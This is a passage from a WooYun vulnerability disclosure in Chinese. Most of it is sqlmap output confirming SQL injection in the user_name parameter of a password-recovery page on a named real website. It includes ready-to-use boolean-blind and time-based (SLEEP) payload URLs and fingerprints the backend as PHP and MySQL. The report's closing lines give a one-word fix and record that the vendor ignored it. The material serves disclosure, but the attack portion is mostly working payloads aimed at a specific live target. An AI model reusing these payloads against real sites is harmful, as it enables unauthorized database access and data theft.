[04:14:04] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[04:14:15] [INFO] target URL appears to have 46 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] N
[04:16:53] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1)
[04:16:53] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[04:18:47] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[04:19:10] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[04:19:33] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[04:19:56] [INFO] target URL appears to be UNION injectable with 46 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[04:29:52] [INFO] testing 'MySQL UNION query (49) - 62 to 80 columns'
[04:30:15] [INFO] testing 'MySQL UNION query (49) - 82 to 100 columns'
[04:30:38] [INFO] testing 'Generic UNION query (49) - 1 to 20 columns'
[04:32:30] [INFO] testing 'Generic UNION query (49) - 22 to 40 columns'
[04:32:53] [INFO] testing 'Generic UNION query (49) - 42 to 60 columns'
[04:33:16] [INFO] testing 'Generic UNION query (49) - 62 to 80 columns'
[04:33:39] [INFO] testing 'Generic UNION query (49) - 82 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 675 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Find_pwd/check_user_name?user_name=
test') AND 9050=9050 AND ('deOm'='deOm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Find_pwd/check_user_name?user_name=
test') AND SLEEP(10) AND ('CtNz'='CtNz
---
[04:35:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.11


8.jpg


由于是延时注入,实在太慢了,而且似乎后面有些问题就不继续了!

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-21 20:58

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价